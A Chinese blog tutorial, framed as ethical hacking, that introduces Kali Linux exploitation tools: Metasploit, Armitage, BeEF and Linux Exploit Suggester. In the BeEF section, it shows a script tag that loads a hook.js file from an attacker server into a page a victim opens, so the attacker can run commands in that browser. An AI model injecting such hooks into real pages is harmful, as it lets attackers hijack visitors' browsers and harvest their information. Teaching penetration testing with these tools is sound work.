小白博客 Kali Linux - 开发工具介绍及应用

在本章中,我们将学习Kali Linux提供的各种开发工具。

Metasploit的

正如我们之前提到的,Metasploit是Rapid7的产品,大部分资源可以在他们的网页https://www.metasploit.com上找到。 它有两个版本 - 商业版和免费版。 这两个版本之间的差异并不大,因此在这种情况下,我们将使用社区版本(免费)。

作为道德黑客,您将使用嵌入了Metasploit社区版本的“Kali Ditribution”,以及通过节省安装时间而非常舒适的其他道德黑客工具。 但是,如果要将其作为单独的工具安装,则可以将其安装在Linux,Windows和OS X等操作系统中。

首先,在Kali打开Metasploit控制台。 然后,转到应用程序→利用工具→Metasploit。

启动后,您将看到以下屏幕,其中Metasploit版本以红色下划线。

在控制台中,如果您使用帮助或? 符号,它会向您显示MSP命令及其描述的列表。 您可以根据您的需求选择,以及您将使用什么。

另一个重要的管理命令是msfupdate ,它有助于使用最新的漏洞攻击来更新metasploit。 在控制台中运行此命令后,您将不得不等待几分钟,直到更新完成。

它有一个很好的命令叫“搜索”,你可以用它来找到你想要的,如下面的截图所示。 例如,我想查找与Microsoft有关的漏洞,命令可以是msf> search name:Microsoft type:exploit 。

其中“搜索”是命令,“名称”是我们正在寻找的对象的名称,“类型”是我们正在寻找什么样的脚本。

另一个命令是“信息”。 它提供有关使用模块或平台的信息,作者是谁,漏洞引用以及负载限制。

阿米蒂奇

metasploit的Armitage GUI是metasploit的补充工具。 它可以对目标进行可视化,建议利用,并揭露高级后期开发功能。

打开它,但首先metasploit控制台应该打开并启动。要打开Armitage,请转至应用程序→利用工具→Armitage。

点击连接按钮,如下图所示。

打开时,您将看到以下屏幕。

阿米蒂奇是用户友好的。 “目标”区域列出了您发现和正在使用的所有机器,被黑客入侵的目标是红色的,有雷暴。

在黑客入侵目标后,您可以右键单击目标,并继续浏览您需要执行的操作,例如浏览(浏览)这些文件夹。

在下面的GUI中,您将看到文件夹(称为控制台)的视图。 只需单击文件夹,即可在不需要metasploit命令的情况下浏览文件夹。

在GUI的右侧,是列出了漏洞模块的部分。

牛肉

BeEF代表浏览器开发框架 。 这是一个专注于Web浏览器的渗透测试工具。 BeEF允许专业渗透测试人员使用客户端攻击矢量来评估目标环境的实际安全状态。

首先,您必须使用以下命令更新Kali软件包 -

root@kali:/# apt-get update  
root@kali:/# apt-get install beef-xss 

To start, use the following command −

root@kali:/# cd /usr/share/beef-xss  
root@kali:/# ./beef 

打开浏览器,输入用户名和密码:beef 

.

BEEF是一个托管在BEEF服务器上的JavaScript文件,需要在客户端浏览器上运行。当它运行时,它会返回到牛肉服务器,传达关于目标的大量信息。它还允许针对目标运行额外的命令和模块。在这个例子中,牛肉钩子的位置在 http://192.168.1.101:3000/hook.js .

为了攻击浏览器,将JavaScript钩子包含在客户端将要查看的页面中。有很多方法可以做到这一点,但最简单的方法是将下列内容插入页面,并让客户机打开它。

<script src = "http://192.168.1.101:3000/hook.js" type = "text/javascript"></script> 

一旦页面加载,返回到牛肉控制面板,点击左上方的“在线浏览器”。几秒钟后,你应该看到你的IP地址弹出显示一个钩状浏览器。在IP上悬停会很快提供信息,比如浏览器版本、操作系统以及安装了什么插件。

要远程运行命令,请单击“Owned”主机。然后,在命令中单击要执行的模块,最后单击“Execute”。

Linux开发提议者 这表明可能利用给定的发布版本‘uname -r’ 的Linux操作系统。 运行,键入以下命令−

root@kali:/usr/share/linux-exploit-suggester# ./Linux_Exploit_Suggester.pl -k 3.0.0

3.0.0是我们要利用的Linux操作系统的内核版本。


本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏大内老A

谈谈分布式事务之二:基于DTC的分布式事务管理模型[上篇]

通过上一篇的介绍,我们知道了SOA真正需要的是一个能够协调服务操作直接(通过服务自身访问的资源)或者间接(通过被调用服务访问的资源)访问的所有资源的分布式事务管...

19470
来自专栏北京马哥教育

Linux开机启动(bootstrap)

计算机开机是一个神秘的过程。我们只是按了开机键,就看到屏幕上的进度条或者一行行的输出,直到我们到达登录界面。然而,计算机开机又是个异常脆弱的过程,我们满心期望的...

21950
来自专栏信安之路

从面试题中学安全

根据 Github 上的面经总结的一些安全岗面试的基础知识,这些基础知识不仅要牢记,而且要熟练操作,分享给大家,共勉。

19500
来自专栏北京马哥教育

linux安全小贴士

对于系统管理员,让产品的系统更安全,免于骇客和黑客的攻击,一直是一项挑战。这是我们关于“如何让Linux系统更安全” 或者 “加固Linux系统“之类话题的第一...

38580
来自专栏Crossin的编程教室

把你开发的网站免费发布到互联网上(2)

前几天,我们介绍了通过 PythonAnywhere 在互联网上创建一个站点: 把你开发的网站免费发布到互联网上(1) 本篇是上一篇的延续,来讲一讲如何将已有的...

39490
来自专栏北京马哥教育

25个Linux服务器安全小贴士,总有一条用得上!

大家都认为 Linux 默认是安全的,我大体是认可的 (这是个有争议的话题)。Linux默认确实有内置的安全模型。你需要打开它并且对其进行定制,这样才能得到更安...

390120
来自专栏大内老A

谈谈分布式事务之二:基于DTC的分布式事务管理模型[上篇]

通过上一篇的介绍,我们知道了SOA真正需要的是一个能够协调服务操作直接(通过服务自身访问的资源)或者间接(通过被调用服务访问的资源)访问的所有资源的分布式事务管...

20770
来自专栏尚国

如何通过审计安全事件日志检测密码喷洒(Password Spraying)攻击

许多渗透测试人员和攻击者通常都会使用一种被称为“密码喷洒(Password Spraying)”的技术来进行测试和攻击。对密码进行喷洒式的攻击,这个叫法很形象,...

24130
来自专栏技术博文

linux ss命令使用详解

ss是Socket Statistics的缩写。顾名思义,ss命令可以用来获取socket统计信息,它可以显示和netstat类似的内容。但ss的优势在于它能够...

55060
来自专栏FreeBuf

挖矿恶意程序纪实分析之 Windows 篇

近期接到客户反馈,其网络中有部分 Windows 系统终端机器异常,安全团队经过分析,发现其仍旧是一起网络挖矿事件。

47330

扫码关注云+社区

领取腾讯云代金券